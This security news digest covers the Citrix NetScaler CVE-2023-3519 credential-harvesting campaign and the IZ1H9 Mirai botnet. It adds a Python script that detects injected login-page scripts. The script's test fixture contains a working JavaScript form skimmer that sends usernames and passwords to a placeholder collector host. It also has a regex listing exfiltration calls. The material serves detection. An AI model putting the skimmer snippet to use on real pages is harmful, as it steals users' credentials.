October 10, 2023 at 02:18AM – Citrix Devices Under Attack: NetScaler Flaw Exploited to Capture User Credentials

Threat actors are exploiting a critical flaw in Citrix NetScaler ADC and Gateway devices to run a credential harvesting campaign. The flaw, CVE-2023-3519, is a code injection vulnerability that allows unauthenticated remote code execution. Attackers use it to insert a malicious script into the authentication web page, which captures user credentials as they are entered. IBM X-Force has identified at least 600 unique victim IP addresses hosting modified login pages. Separately, Fortinet FortiGuard Labs discovered an updated version of the IZ1H9 Mirai-based DDoS campaign, which targets IP cameras and routers using a range of exploits. Organizations are urged to apply patches promptly and to change default login credentials on affected devices.

Key takeaways from the meeting notes:

1. Threat actors are exploiting a critical flaw in Citrix NetScaler ADC and Gateway devices to conduct a credential harvesting campaign.
2. The flaw, CVE-2023-3519, is a code injection vulnerability that can lead to unauthenticated remote code execution.
3. IBM X-Force discovered the activity: attackers use the flaw to insert a malicious script into the authentication web page, which captures user credentials as they are entered.
4. After exploitation, the attackers deploy a PHP-based web shell and use it to modify the NetScaler Gateway login page so that it collects the username and password submitted by each user.
5. Over 600 unique victim IP addresses hosting modified NetScaler Gateway login pages have been identified, mainly in the U.S. and Europe.
6. The campaign has been ongoing for nearly two months; the earliest login page modification is dated August 11, 2023.
7. The attacks have not been attributed to any known threat actor or group.
8. Separately, Fortinet FortiGuard Labs has discovered an updated version of the IZ1H9 Mirai-based DDoS campaign, which targets vulnerabilities in IP cameras and routers from various manufacturers.
9. The campaign uses recently released exploit code for a number of CVEs to infect vulnerable devices and grow its botnet, which is then used for brute-force and DDoS attacks.
10. Organizations are strongly advised to apply patches promptly, change default login credentials on devices, and implement appropriate mitigations against volumetric DDoS attacks. Patching closes the injection flaw but does not remove a web shell that is already present or restore a login page that has already been modified, so exposed NetScaler devices should also be checked for tampering.
11. An unpatched remote command injection flaw in the D-Link DAP-X1860 range extender (CVE-2023-45208) also allows threat actors to run shell commands during the device's setup process.
12. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an advisory highlighting the risk of volumetric DDoS attacks and urging organizations to implement mitigations.
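The login-page tampering described in items 3 and 4 can be checked for mechanically. The following Python script is an added example, not code from the article or from IBM X-Force: it parses a saved copy of the gateway's login page, flags script tags whose source is served from a host outside the appliance (unless allowlisted), and flags inline scripts that both reference the credential inputs and contain a network-send call, alongside a fingerprint comparison against a known-good copy. The form field names (login, passwd), the two sample pages and the collector.invalid host are constructed for the example and are not indicators from the real campaign.

```python
"""Scan a saved copy of a NetScaler Gateway style login page for injected
credential-harvesting scripts.  Added example: the sample pages, field names
and the collector.invalid host below are constructed, not real indicators."""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed names of the login form's credential inputs (hypothetical; set
# them to whatever the appliance's page actually uses).
CREDENTIAL_FIELDS = ("login", "passwd")
# Patterns that show a script sends data off the page.
EXFIL_RE = re.compile(
    r"fetch\s*\(|XMLHttpRequest|sendBeacon|new\s+Image|\.src\s*=|WebSocket")


class _ScriptCollector(HTMLParser):
    """Collect every <script> tag's src attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []          # [{"src": str | None, "body": str}, ...]
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append({"src": dict(attrs).get("src"), "body": ""})
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and self.scripts:
            self.scripts[-1]["body"] += data


def find_injected_scripts(html, allowed_hosts=()):
    """Return (kind, detail) findings for scripts that do not belong on the
    login page.  Relative src paths are served by the appliance itself and
    pass; absolute or protocol-relative sources must be allowlisted."""
    parser = _ScriptCollector()
    parser.feed(html)
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for script in parser.scripts:
        src = script["src"]
        if src is not None:
            host = urlparse(src).netloc.lower()
            if host and host not in allowed:
                findings.append(("external_script", src))
            continue
        body = script["body"]
        touches_creds = any(field in body for field in CREDENTIAL_FIELDS)
        if touches_creds and EXFIL_RE.search(body):
            findings.append(("inline_harvester", body.strip()[:60]))
    return findings


def page_fingerprint(html):
    """SHA-256 of the page text, for comparison against a stored baseline
    taken from a patched, clean appliance."""
    return hashlib.sha256(html.encode("utf-8")).hexdigest()


# Constructed stand-in for a clean login page (not the real NetScaler file).
CLEAN_PAGE = """<html><head>
<script src="/vpn/js/gateway_login_view.js"></script>
</head><body>
<form id="loginForm" method="post" action="/cgi/login">
<input name="login"><input type="password" name="passwd">
</form>
</body></html>"""

# Constructed tampered copy: a script appended before </body> hooks the
# form and beacons the fields to a collector; a second tag loads code from
# outside the appliance.  collector.invalid is a placeholder host.
TAMPERED_PAGE = CLEAN_PAGE.replace("</body>", """<script>
document.getElementById('loginForm').addEventListener('submit', function () {
  var u = document.getElementsByName('login')[0].value;
  var p = document.getElementsByName('passwd')[0].value;
  navigator.sendBeacon('https://collector.invalid/c', u + ':' + p);
});
</script>
<script src="//collector.invalid/hook.js"></script>
</body>""")

if __name__ == "__main__":
    baseline = page_fingerprint(CLEAN_PAGE)
    for name, page in (("clean", CLEAN_PAGE), ("tampered", TAMPERED_PAGE)):
        print(name, "matches baseline:", page_fingerprint(page) == baseline,
              "findings:", find_injected_scripts(page))
```

The fingerprint comparison is the decisive check when a known-good copy of the page exists; the script heuristics are for the case where no baseline was kept, and they will miss an injected script that is obfuscated enough to hide the field names or the send call, so a finding of nothing is not proof the page is clean.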

Full Article – https://ift.tt/5Vd1Suq